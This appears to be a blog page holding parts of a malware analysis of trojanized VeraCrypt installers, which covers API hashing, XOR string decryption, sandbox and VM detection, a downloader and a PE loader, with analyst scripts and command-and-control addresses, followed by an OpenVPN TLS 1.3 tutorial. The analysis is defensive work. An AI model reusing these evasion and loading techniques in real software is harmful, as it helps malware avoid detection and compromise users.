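A target offset of 0 means the jump lands on the very first byte of the payload copied to the stack.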

Let’s summarize: [ID].exe loads and decrypts big_log to a buffer, which gets copied onto the stack while overflowing the saved EBP and return address. The flow eventually uses a gadget in [ID].exe’s code to jump to ESP, freshly overwritten with a relative jump back to the beginning of the decrypted big_log payload on the stack.

That’s the convoluted way this piece of malware executes big_log!

Executing the payload

big_log wants to load kernel32.dll and call VirtualAlloc from it, but does not want any mention of “kernel32.dll” in its code. What can it do instead?

Answer: Iterate over loaded DLL names, calculate a checksum on the name, and compare it to a hardcoded value! That’s what I understood after debugging the program for a while.

Finding kernel32.dll in big_log, breakpoint set on the comparison with a hardcoded checksum

The checksum algorithm is trivial, and can be translated into PHP as follows:

<?php
// implements the ror (rotate) instruction over a dword
function ror($data, $bits) {
	$tmp = str_pad(decbin($data), 32, "0", STR_PAD_LEFT);
	return bindec(substr($tmp, -$bits).substr($tmp, 0, -$bits));
}

function checksum($name) {
	// convert name to Unicode
	$name = mb_convert_encoding(strtoupper($name), 'UTF-16LE', 'UTF-8');

	$state = 0;
	for($i=0;$i<strlen($name);$i++) {
		$state = ror($state, 0xD);
		$state = ($state + ord($name[$i])) & 0xFFFFFFFF; // stay within 32 bits
	}
	return dechex($state);
}

echo checksum("KERNEL32.DLL");  //6a4abc5b

When “KERNEL32.DLL” gets hashed, the digest is 6a4abc5b, which matches the comparison. Then, each exported function of this DLL is iterated over to find a match with “VirtualAlloc”.

Finding VirtualAlloc in kernel32.dll exports by iterating on all exports

The address of VirtualAlloc is then calculated.

Calculating the address of VirtualAlloc

Then, the function is called as VirtualAlloc(NULL, 0xA68, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE).

Calling VirtualAlloc

Moving forward, the rest of big_log is copied to the newly allocated memory then executed. This is done by pointing to the location on the stack right after the jmp 19DCD0 at 19DD29, and copying 3,424 bytes until before the padding of NOPs we noticed before. The absolute offset in the decrypted big_log file is 324.

Copy the rest of big_log and call it

Second-stage big_log

After a very useful OutputDebugStringA("HelloShell"), the following code tries to locate the addresses of required functions from kernel32.dll, shell32.dll and user32.dll, using techniques similar to those we have covered before. In particular, it locates:

  • GetProcAddress
  • VirtualAlloc
  • LoadLibraryA
  • GetProcessHeap
  • HeapAlloc
  • HeapReAlloc
  • HeapFree
  • CreateFileA
  • GetFileSizeE
  • ReadFile
  • CloseHandle
  • lstrcatA
  • SHGetFolderPathA
  • wsprintfA

The next steps are as follows, as I reconstructed them after debugging the code:

VirtualAlloc(NULL, 260, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SHGetFolderPathA(NULL, CSIDL_APPDATA, NULL, 0, &path);
lstrcatA(path, "id.txt");
h = CreateFileA(path, 1, FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);  // disposition 3 is OPEN_EXISTING
GetFileSize(h, &size);
VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ReadFile(h, &f);
CloseHandle(h);
wsprintfA(&id, "%s", f);
VirtualAlloc(0, 258, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SHGetFolderPathA(NULL, CSIDL_APPDATA, NULL, 0, &path2);
lstrcatA(path2, "\\");
lstrcatA(path2, id);
lstrcatA(path2, "\\");
lstrcatA(path2, "data");
OutputDebugStringA(path2);
h2 = CreateFileA(path2, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
GetFileSize(h2, &size2);
VirtualAlloc(NULL, size2, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ReadFile(h2, &data);
CloseHandle(h2);

This basically gets the ID from id.txt, then loads [ID]\data.

data is then decrypted in memory by XORing it with id.

Next, the code is reminiscent of the PE loader found in the fake VeraCrypt binary (see Part 1). That is, making sure the DLL is a valid PE file, preparing the Import Address Table, copying the code section into a newly allocated region then calling the start function of data.

In summary, big_log simply loads and passes control over to the encrypted data DLL (hereafter named data.dll, to differentiate it from the data function exported from md5(lower(username)).dll).

data.dll: String obfuscation

OutputDebugStringA("Start In Exe Nu");

After this greeting, a function is called that deals with decrypting a bunch of strings. The calls look like this:

dword_40A6E8 = (int)sub_40585A((int)"85&1DO<-!*<7-R<.3-&|R*U", "IBCC06IDNKOSI4FMIUER1E8", 23);
dword_40A198 = (int)sub_40585A((int)&unk_4060A0, "9S2L", 4);
dword_40A4D0 = (int)sub_40585A((int)&unk_4060B4, "XQI90QYP", 8);
dword_40A6E4 = (int)sub_40585A((int)&unk_4060D0, "9F3L7XE6ZK5N6", 13);
dword_40A4C4 = (int)sub_40585A((int)"b\a2!%,16\r\"9]\b", "9WSSQBTDCCT8U", 13);

The function sub_40585A simply XORs the first two arguments, the third one being the length. For the first instance, the result is: "85&1DO<-!*<7-R<.3-&|R*U" ^ "IBCC06IDNKOSI4FMIUER1E8", which gives “qwertyuioasddfzczxc.com”.

Oh, a domain name! It doesn’t seem to exist anymore, but apparently it was also used in another similar piece of malware in 2018 to exfiltrate data with POST requests to /p1.php. A previously known IP resolved from the domain is 176.114.6.101, located in Ukraine.
Spoiler for Part 3: this other piece of malware is from the same family!

The other string decryptions with “unk_” variables simply correspond to non-printable strings. For instance, unk_4060A0 is “\x17\x30\x5D\x21”. Once XORed with “9S2L”, it gives “.com”.
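
The two decryptions above can be reproduced outside of IDA with a few lines of Python. The function name is mine; the inputs are the ones shown in the calls to sub_40585A.

```python
def xor_decrypt(blob, key, length):
    """XOR the first `length` bytes of blob and key, like sub_40585A does."""
    return bytes(blob[i] ^ key[i] for i in range(length))


print(xor_decrypt(b"85&1DO<-!*<7-R<.3-&|R*U", b"IBCC06IDNKOSI4FMIUER1E8", 23))
# b'qwertyuioasddfzczxc.com'
print(xor_decrypt(b"\x17\x30\x5D\x21", b"9S2L", 4))
# b'.com'
```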

Sequential string decryption

I see some “CryptEncrypt” and “CryptHashData” names, which means we may have fun later on with some crypto! Unless the code just prepares the strings for all exported functions and in the end does not use all of them 😦

Automatic name decryption with IDAPython

Instead of debugging and renaming the variables manually in IDA, I decided to try to make my first IDAPython script. I followed this tutorial on automatically decrypting strings in a specific malware sample, then instead of adding a comment, I renamed the variable to the decrypted string.

The code goes as follows. It first gets all the Xrefs to the decryption function (located at 0x40585A), then identifies the last three pushes as the two strings to XOR and their length. I found cases where the length was pushed with a push 123, pop ebx, push ebx, so in case I find a push e** in place of the length, I instead calculate the string length, hoping it captures everything (there might be null bytes in some strings).

After XORing the two identified strings, the script identifies the next mov dword_ABCDEF, eax and renames the variable to the decrypted string.

import idc
import idautils

# Written against the legacy IDAPython function names (GetMnem, Byte, MakeNameEx, ...).
DECRYPT_FUNC = 0x40585A

def find_previous_push(addr):
  # walk backwards to the closest push; returns [address, operand value]
  while True:
    addr = idc.PrevHead(addr)
    if idc.GetMnem(addr) == "push":
      # an operand containing "e" is treated as a register (push e**): value unknown
      if "e" in idc.GetOpnd(addr, 0):
        return [addr, -1]
      return [addr, idc.GetOperandValue(addr, 0)]

def find_next_mov(addr):
  # walk forwards to the closest mov X, eax; returns [address, destination operand]
  while True:
    addr = idc.NextHead(addr)
    if idc.GetMnem(addr) == "mov" and "eax" in idc.GetOpnd(addr, 1):
      return [addr, idc.GetOperandValue(addr, 0)]

def decryptAtAddress(addr):
  # get last push (first string)
  [addr, arg1] = find_previous_push(addr)
  # get second to last push (second string)
  [addr, arg2] = find_previous_push(addr)
  # get third to last push (length)
  [addr, length] = find_previous_push(addr)

  # could not identify length (e.g., push ebx instead of push 10)
  if length < 0:
    s1 = idc.GetString(arg1, -1)
    s2 = idc.GetString(arg2, -1)
    ls1 = 0 if s1 is None else len(s1)
    ls2 = 0 if s2 is None else len(s2)
    length = max(ls1, ls2)

  # sanity check
  if length > 500:
    length = 500

  out = ""
  # actually XOR the strings, byte by byte
  for i in range(0, length):
    out += chr(idc.Byte(arg1) ^ idc.Byte(arg2))
    arg1 += 1
    arg2 += 1

  return out

def renameNextVar(addr, name):
  # get next mov X, eax
  [addr, arg] = find_next_mov(addr)

  if idc.MakeNameEx(arg, name, idc.SN_NOWARN | idc.SN_NOCHECK):
    print("Renamed 0x%x to %s" % (arg, name))
  else:
    print("FAILED to rename 0x%x to %s" % (arg, name))

# main loop: runs last, once all the helpers above are defined
for x in idautils.XrefsTo(DECRYPT_FUNC, flags=0):
  ref = x.frm
  dec = decryptAtAddress(ref)
  print("Ref Addr: 0x%x | Decrypted: %s" % (ref, dec))
  renameNextVar(ref, dec)

And this is the result:

After automatically renaming variables after their decrypted content

Beautiful! There are 350+ strings like this, so the script was quite useful.

Afterwards, strings that correspond to a library function name are loaded through GetProcAddress. To rename the corresponding variables that designate the function pointer, I also made a lazy script adapted from the pattern I’ve seen in the code: I noticed that there is a push for the string, then five instructions later, the function pointer is moved to a variable. So my script simply identifies the string being pushed and renames the variable 5 instructions later…

addr = 0x40331F
while addr < 0x403B67:
  # look for a pushed string (skip the push of the module handle)
  if idc.GetMnem(addr) == "push" and "[ebp+hModule]" not in idc.GetOpnd(addr, 0):
    name = "_%s" % idc.GetOpnd(addr, 0)
    print(name)
    # the function pointer is stored five instructions after the push
    nextMov = addr
    for _ in range(5):
      nextMov = idc.NextHead(nextMov)
    if idc.GetMnem(nextMov) == "mov" and "eax" in idc.GetOpnd(nextMov, 1):
      target = idc.GetOperandValue(nextMov, 0)
      idc.MakeNameEx(target, name, idc.SN_NOWARN | idc.SN_NOCHECK)
      print("Renamed 0x%x to %s" % (target, name))
  addr = idc.NextHead(addr)

This gives me:

After automatically renaming function pointer variables

The script doesn’t work perfectly, but the remaining variables can be corrected manually.

data.dll: Anti-analysis checks

After decrypting many strings, data.dll checks for the presence of an emulator or a virtual machine in a number of ways.

First, the Windows username is checked against known keywords such as “sandbox”, “virus”, “malware”, “nod”, “kas”, “av”, “kis”, “STRAZNJICA.GRUBUTT”, “esset”.

Checking for known malware sandbox Windows username
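
In Python, the username check could be sketched roughly as follows. The keyword list is the one given above; the case-insensitive substring matching and the function name are assumptions on my part, not something confirmed from the disassembly.

```python
# Keywords listed above, as found in data.dll.
KEYWORDS = ("sandbox", "virus", "malware", "nod", "kas", "av", "kis",
            "STRAZNJICA.GRUBUTT", "esset")


def username_looks_like_sandbox(username):
    """Return True if any keyword appears in the username (assumed matching rule)."""
    name = username.lower()
    return any(keyword.lower() in name for keyword in KEYWORDS)
```

If the matching really is a substring test, short keywords such as “av” would also flag innocent usernames like “dave”.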

Other checks are reminiscent of our previous analysis in Part 1: the size of the memory is assessed (here, the malware stops if there is less than 2.33 GiB of RAM), Sleep functions are verified to be executed and not skipped, the number of CPU cores is verified (at least two cores are needed), and a nonexistent file is checked to make sure it does not suddenly exist.
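
The logic of the memory, CPU and Sleep checks boils down to something like this sketch. The thresholds come from the description above; the function names, the sleep duration and the tolerance are hypothetical, and the real code obviously calls Windows APIs rather than Python.

```python
import time

MIN_RAM_BYTES = int(2.33 * 1024 ** 3)   # the malware stops below 2.33 GiB
MIN_CPU_CORES = 2                       # at least two cores are needed


def hardware_looks_real(ram_bytes, cpu_cores):
    """Return True if the machine passes the RAM and CPU core checks."""
    return ram_bytes >= MIN_RAM_BYTES and cpu_cores >= MIN_CPU_CORES


def sleep_is_honoured(seconds=0.2, tolerance=0.5):
    """Return True if a sleep really took (roughly) the requested time."""
    start = time.monotonic()
    time.sleep(seconds)
    return (time.monotonic() - start) >= seconds * tolerance
```

An emulator that skips sleeps to speed up the analysis would fail the second function, since almost no time elapses between the two clock readings.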

In addition, two new checks look for artifacts of VMware and VirtualBox by probing the registry for a known key, and by looking for known driver files.

Simple check for the presence of VMware Tools from the registry
Checking for VirtualBox from known driver files

Overall, the anti-analysis checks run as follows.

Overall anti-analysis checks

In the next part of this write-up, I will describe the main payload of data.dll. Stay tuned!

Update: Part 3 is available and deals with analyzing the main likely payloads.

An Analysis of Modified VeraCrypt binaries (Part 1)

On January 29, 2020, the Twitter account of VeraCrypt (@VeraCrypt_IDRIX) posted a tweet about a fake VeraCrypt website (httx://vera-crypt[.]com) that was distributing modified VeraCrypt installers signed with a valid EV code signing certificate from an unknown company. I was intrigued. The fake website was still up, so I decided to look into it. Here is a write-up of my analysis to try to understand what the modified binaries do, how they are obfuscated, who the authors could be, and what the motivation is.

A phishing website?

The fake website looked identical to the official VeraCrypt website, but the links on the pages didn’t work too well. In particular, the download page was only serving the installer binaries for Windows and Mac, and the portable version for Windows. The rest led to a 404 error page. Interestingly, the Mac binary was actually genuine; only the Windows binaries were modified.

Assuming the binaries are malicious in some way (which we will know for sure very soon), a successful attack would first require a victim to be lured into visiting the fake website. In fact, someone abused Google Ads to promote the fake website when searching for “veracrypt” on Google. A contact at ESET further told me that the ad was most likely targeted at Canada only.

Modified VeraCrypt installer

In this article, I will focus on the modified installer for Windows, as it’s probably the most common format people download. It is signed by a certificate issued to Calmic Software Ltd, a UK software development company.

Signature of the fake VeraCrypt installer. SHA-256: 9ebad58d714acb30422394bf8473f98dbc94446fc6918287cf5c4dd11324de3b

The fake installer version info matches that of the official VeraCrypt v1.23 from September 2018.

Fake VeraCrypt’s version info

In terms of size, the fake installer is slightly smaller than the official one (35,821,320 vs. 35,837,752 bytes, respectively). This does not necessarily mean something was “removed”. For instance, the difference in the signature certificates could easily account for the difference. But this may hint at a slight modification of VeraCrypt, maybe a backdoor?

I compared both binaries using Beyond Compare, which looks at each byte from the two files and tries to account for misalignment due to inserted/removed data. That’s how I started when I studied the official builds of TrueCrypt against their source codes. On the right image here, you can visualize in red the sections that are dissimilar. The white block that fills the first quarter is a section where both files fully match. So, this is not a totally different binary. Rather, there is still a taste of VeraCrypt here.

TrueCrypt/VeraCrypt’s installer is actually built as follows: the files to extract/install on a system are compressed and packaged at the end of the installer’s binary file. The logic of the installer is located at the beginning, which is roughly the part that is identical between the official and fake installers. The non-matching part therefore seems to correspond mostly to the compressed payload.

Roughly same installers

Firing up IDA Pro and BinDiff, I was able to identify mismatching functions inside the installer. Most functions matched, except for a few.

BinDiff output showing one main function difference and maybe a few more in the installer

The biggest difference is in sub_4236F0 (real) / sub_421540 (fake). The real function is populated with 100+ lines of decompiled code, while the fake installer’s version simply consists of “return 1;“.

These functions are called from the main function as follows.

Call to the function that’s modified in the fake installer

The string “DIST_PACKAGE_CORRUPTED” led me to a line in VeraCrypt source code in Setup.c that gives me the name of this function: VerifyModuleSignature.

VerifyModuleSignature is an addition in VeraCrypt compared to TrueCrypt, which verifies that the certificate used to sign the binary is the genuine VeraCrypt certificate, by comparing its hash against a hardcoded value. That must have pissed off the malware author, who went the extra mile to re-sign the modified installer with a valid EV code signing certificate, yet could not run the installer without modifying it 🙂
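
Conceptually, this kind of certificate pinning and its bypass look like the sketch below. It is not VeraCrypt’s actual code: the hash algorithm (SHA-256 here), the function names and the inputs are all assumptions chosen for illustration.

```python
import hashlib
import hmac


def certificate_is_pinned(cert_der, expected_sha256_hex):
    """Compare the hash of a certificate against a hardcoded value."""
    digest = hashlib.sha256(cert_der).hexdigest()
    return hmac.compare_digest(digest, expected_sha256_hex.lower())


def certificate_is_pinned_patched(cert_der, expected_sha256_hex):
    """What the fake installer's version amounts to: always succeed."""
    return True
```

With the check replaced by a constant result, any certificate passes, including the one issued to an unrelated company.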

Next, the functions write_string, write_string_0 and other statically-linked libraries seem to be functionally the same, but technically slightly different. They are most likely fine. The differences could be explained by the mismatch between the version of the compiler used for the official and fake builds.

Finally, sub_41ABF0 / sub_41AC50 is a VeraCrypt function responsible for checking whether the system boots with EFI/GPT or not. I was able to identify the function thanks to hardcoded error messages pointing to GetSystemDriveConfiguration. Due to code inlining, the source code looks much more concise than the actual generated code. That makes the identification of differences more difficult. Nevertheless, I was able to understand the few small differences I found.

One difference resides in the code generated for .str(). Again, this has to do with compiler versions. Another one also probably has to do with a library, but I was unable to confirm. The location of this difference, in GetSystemDriveConfiguration (a low interest function), probably indicates this is just an artifact of the compilation rather than a motivated change. The difference in the decompiled code is shown below.

Official (left) and fake (right) installer’s main difference in GetSystemDriveConfiguration

So, essentially, the installer code is the same as the official one, minus the signature certificate check.

Different extracted files

Now, let’s run the installer to extract its files. I often use Sandboxie to run this kind of unknown executable, but there’s always a risk it grabs real info from my system when it runs and sends it away. So in this case, I prefer to run it inside a virtual machine, on a fresh install of Windows.

Let’s extract VeraCrypt files from the fake installer

Next, we continue to compare the extracted files against the official VeraCrypt v1.23 files. However, most of them are different… This could be explained by a different way of compiling VeraCrypt, in which case I might need to figure out which version of the compiler and environment settings were used. That could be a pretty painful process.

Comparing the official (left) with the fake (right) extracted files (v1.23). Ignore the timestamps. Files in red differ; files in black are the same.

Before I start the endeavor of recompiling VeraCrypt with different configurations, how about we check the extracted files’ version info again? Good hunch, the versions of the extracted files do not match. While the fake installer corresponds to v1.23, the extracted files are actually from v1.23-Hotfix2. Go figure who repackaged this with the wrong installer…

Official veracrypt.inf v1.23 (left), fake veracrypt.inf v1.23-Hotfix2 (right)

OK, let’s compare with VeraCrypt v1.23-Hotfix2 extracted files then:

Comparing the official (left) with the fake (right) extracted files (v1.23-Hotfix2). Ignore the timestamps.

Now, only VeraCrypt.exe and VeraCrypt-x64.exe differ. We are getting closer…

Modified VeraCrypt[-x64].exe

Firing up IDA Pro and BinDiff, I was able to identify mismatching functions inside VeraCrypt-x64.exe. Most functions matched, except for a few.
Note: I did the same exercise with VeraCrypt.exe and found similar results, so I’ll skip the analysis here.

BinDiff output showing at least three to four dissimilar functions

Let’s start with the most different function, with a similarity score of 0.00: sub_140001900 in the fake installer.

What you see in this function is something you do not want to see in an application like VeraCrypt: it wants to connect to a server. Note the first condition on the result of sub_140001780, which is already identified with BinDiff as another mismatching function (second-to-last in the list).

Parts of sub_140001900

The result of sub_140001780 is simply the result of calling InternetCrackUrlA on the argument to the function, which basically splits parts of the URL (yes, it’s a legitimate Windows function, despite the name). So this condition will always work if the URL is good.

sub_140001780
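
For readers not familiar with InternetCrackUrlA, a rough Python equivalent of this kind of URL splitting is shown below. It relies on the standard urllib.parse module rather than WinINet; the function name and the example URL in the usage note are placeholders, not values from the malware.

```python
from urllib.parse import urlsplit


def split_url(url):
    """Split a URL into its components, or return None if it is not usable."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        return None
    return {
        "scheme": parts.scheme,
        "host": parts.hostname,
        "port": parts.port,
        "path": parts.path,
        "query": parts.query,
    }
```

Calling split_url("http://example.com:8080/dir/file.php?x=1") yields the scheme, host, port, path and query separately, which is what the download code needs in order to open a connection and issue a request.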

So what’s the URL? The function sub_140001900 is called by sub_140001E00, the third-to-last function identified by BinDiff. And here is your URL passed as argument!

Parts of sub_140001E00

Let’s rename the functions with the knowledge we gained so far.
sub_140001900 is basically in charge of fetching a URL, let’s call it download_file.
sub_140001780 parses a URL, it’ll be called crack_url.

Now let’s dig further into sub_140001E00 to understand what it does with the downloaded file. From my understanding, it simply is a PE loader: it makes sure the file is a Windows binary (checks for MZ and PE signatures), copies the content to a newly allocated memory region, parses the file’s import table to load the required DLLs into memory and provide their addresses, then it passes control to the file’s entry point.

Verifying the file is a valid Windows executable (annotations are mine) in sub_140001E00
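
The first step of such a loader, the signature check, can be sketched in Python as follows. It follows the standard PE layout (the “MZ” magic at offset 0 and the e_lfanew field at offset 0x3C pointing to the “PE\0\0” signature); the function name is mine and the sketch does not try to mirror the malware’s exact code.

```python
import struct


def looks_like_pe(blob):
    """Check the MZ and PE signatures of a candidate Windows executable."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    # e_lfanew: file offset of the PE header, stored at offset 0x3C
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
```

The same check is handy on the analyst’s side to confirm that a downloaded or decrypted payload is indeed an executable before loading it in a disassembler.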

We will therefore rename sub_140001E00 to download_and_run_dll. In turn, this function is called by a StartAddress function.

StartAddress

StartAddress is called from the main (wWinMain) as a new thread, which keeps running thanks to the infinite loop. Note the addition of StartAddress compared to the official VeraCrypt’s main function.

Modified and original wWinMain functions in VeraCrypt-x64.exe

What’s in getdll.php?

At this point, it is clear that the modified VeraCrypt’s main binary has had a downloader added that fetches a remote payload hosted at 188.225.35.8.

The DLL returned from /getdll.php is a pretty verbose piece of code that further fetches other payloads and places them in a folder in %AppData%, named after some unique identifier returned from a request to /id.php.

To fetch the payloads, the “getdll” DLL comes with its own small HTTP client.

HTTP client in the DLL returned from getdll.php

It proceeds to do a POST request to various URLs while sending the data “geo”.

Fetching further payloads and writing them to disk

Eventually, the payloads will look like this on disk:

Dropped payloads in %AppData%
Dropped payloads in %AppData%\[ID]

The mapping between URLs and filenames is as follows:

  • 188.225.35.8/work/?work <-> [ID]\[ID].exe
  • 188.225.35.8/work/?code <-> [ID]\big_log
  • 188.225.35.8/work/?data=[ID] <-> [ID]\data
  • 188.225.35.8/work/?service <-> [ID]\pulse
  • 188.225.35.8/work/?check <-> [md5(username)].dll
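
The mapping above can be written down as a small helper, which is convenient when emulating the server or checking a machine for dropped files. This is only a sketch: the function name is hypothetical, and I am assuming the username is lowercased (as in the md5(lower(username)).dll notation used in Part 2) and UTF-8 encoded before hashing.

```python
import hashlib

C2_HOST = "188.225.35.8"


def payload_map(victim_id, username):
    """Map each payload URL to the file it is written to under %AppData%."""
    # Assumption: lowercase + UTF-8 before hashing the username.
    dll_name = hashlib.md5(username.lower().encode("utf-8")).hexdigest() + ".dll"
    base = C2_HOST + "/work/?"
    return {
        base + "work": "%s\\%s.exe" % (victim_id, victim_id),
        base + "code": "%s\\big_log" % victim_id,
        base + "data=" + victim_id: "%s\\data" % victim_id,
        base + "service": "%s\\pulse" % victim_id,
        base + "check": dll_name,
    }
```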

pulse is encrypted when written to disk, by simply XORing the content with the [ID].

sub_180001E50 in getdll DLL

Similarly, the file proxy.txt contains the string “veracrypto.com” XORed with the [ID], and the file mask.txt contains the encrypted string “%d_yq_%02u.%02u.%02u”. data is also encrypted the same way, this time by the server (recall the ?data=[ID] argument). Finally, so that it knows which unique ID was picked, the ID is kindly written in the id.txt file in %AppData%. If the file is present, getdll will not fetch these DLLs again.

In the next parts of this write-up, I will cover what’s included in those multiple payloads, and how I emulated the malicious server as it stopped serving the malicious payloads due to the complaint addressed to its hosting provider. Stay tuned!

Update: Part 2 deals with plenty of obfuscation and anti-analysis techniques in the payloads.

OpenVPN 2.4.8 still does not support TLS 1.3 & how to fix it on Windows

OpenVPN is a client and server VPN implementation that runs on multiple platforms. It establishes a virtual network over a channel secured by TLS. In 2020, you would expect it to support the latest TLS protocol. Well, no. But we can fix that (at least on Windows).

Update: On April 17, version 2.4.9 was released with an up-to-date OpenSSL that supports TLS 1.3. The current tutorial is still useful to update the OpenSSL library of OpenVPN that may get outdated. As a matter of fact, a security fix for OpenSSL (v1.1.1g) was released just 4 days after the latest OpenVPN release, which remains unpatched as of May 2nd, 2020 unless you proceed to update the library.

OpenVPN and OpenSSL versions

The latest version of OpenVPN for Windows as of February 2020 is v2.4.8 and was released on October 31st, 2019.

In v2.4.5 (April 2018), the support for TLS 1.3 (finalized in August 2018) was already visible from the changelog:

Add support for TLS 1.3 in --tls-version-{min, max}

In v2.4.7, the support was clearly advertised: “One of the big things is enhanced TLS 1.3 support.“, one can read.

However, if you proceed to download and install OpenVPN for Windows (either the Win7 or Win10 installer), you will find that it comes with older OpenSSL DLLs. Namely, with v1.1.0l that was released in September 2019.

If you are not familiar with OpenSSL versions, you should know that several branches are maintained in parallel.

  • v1.0 is the oldest branch still supported. It does not and will never support TLS 1.3.
  • v1.1.0 is a more recent branch that changed a lot of internal stuff, and the API is incompatible with earlier versions. Switching from v1.0 to v1.1.0 requires some code changes in the application. However, this branch does not support TLS 1.3 yet. The good thing is that it’s been made in such a way that an application compatible with this version can simply upgrade to v1.1.1 with no code rewrite needed.
  • v1.1.1 is just v1.1.0 with the added support for TLS 1.3.
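
As a quick rule of thumb, the branch logic above can be expressed as a tiny version check. It is a simplified sketch: the function name is mine, and it only looks at the numeric part of the version string (the trailing letter, as in 1.1.0l, is ignored).

```python
import re


def supports_tls13(openssl_version):
    """Return True if an OpenSSL version string is from the 1.1.1 branch or later."""
    match = re.match(r"^(\d+)\.(\d+)\.(\d+)", openssl_version)
    if match is None:
        raise ValueError("unrecognized OpenSSL version: %r" % openssl_version)
    return tuple(int(part) for part in match.groups()) >= (1, 1, 1)
```

For example, supports_tls13("1.1.0l") is False while supports_tls13("1.1.1d") is True, which is exactly the gap between what OpenVPN 2.4.8 ships and what we want.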

Why does OpenVPN not include OpenSSL v1.1.1? You may wonder when this version of OpenSSL was released. Well, that was back in September 2018! So I really don’t see any reason why they would package a version of OpenSSL dating from 2019 but from the v1.1.0 branch. Like, why??

One notable advantage of using TLS 1.3 with OpenVPN is that when your server runs with mutual authentication, the client certificates are sent to the server in an encrypted form and are no longer in plaintext on the wire. That means someone passively looking at your traffic (e.g., airport’s WiFi hotspot, ISP) may no longer recognize that you are Alice or Bob based on your certificate. I think that’s already a good plus for privacy, and there is no reason you shouldn’t benefit from it right now.

I complained about this on Twitter, but didn’t get a reply from @OpenVPN.

Let’s fix it

OpenVPN bundles OpenSSL as DLLs, meaning you can replace the OpenSSL component without touching the OpenVPN executable. In %ProgramFiles%\OpenVPN\bin, you can find the two OpenSSL DLLs: libssl-1_1-x64.dll and libcrypto-1_1-x64.dll.

Going to the properties of these files, you can see the outdated version of OpenSSL.

Original libcrypto-1_1-x64.dll v1.1.0l installed by OpenVPN 2.4.8 for Windows 10

Now, we want to replace these DLLs with more recent ones from the v1.1.1 branch. The most paranoid solution would be to download the source code from openssl.org and compile it ourselves. This is not the easiest solution, though. More realistically, I like OpenSSL’s wiki suggestion of a third-party that provides reproducible builds: https://bintray.com/vszakats/generic/openssl.

Go and download the latest version in the v1.1.1 branch; today, that would be openssl-1.1.1d-win64-mingw.zip. Identify the two DLLs in the archive and overwrite the ones in OpenVPN’s installation folder. You should end up with something like this (note that the replacement DLLs appear older according to the “Date modified” column: they were compiled earlier, but from a newer version).

Verify the properties of the newer DLLs:

Newer libcrypto-1_1-x64.dll v1.1.1d from https://bintray.com/vszakats/generic/openssl

You may now (re)start OpenVPN, and enjoy a version of OpenSSL that lets you negotiate TLS 1.3 with a server (if compatible).

OpenVPN v2.4.8 running with OpenSSL v1.1.1d on Windows 10 x64
Running OpenSSL 1.1.1d, OpenVPN can negotiate TLS 1.3 with a compatible server

Voilà! Don’t forget to keep OpenVPN up-to-date, and if it still doesn’t come with the right version of OpenSSL, redo this step.

The Android OpenVPN app is also stuck at TLS 1.2, but I haven’t figured out a way to fix it. If you have one, please let me know.

In another post, I will go over a proper configuration for OpenVPN server, because there are plenty of misleading and outdated beliefs on this topic.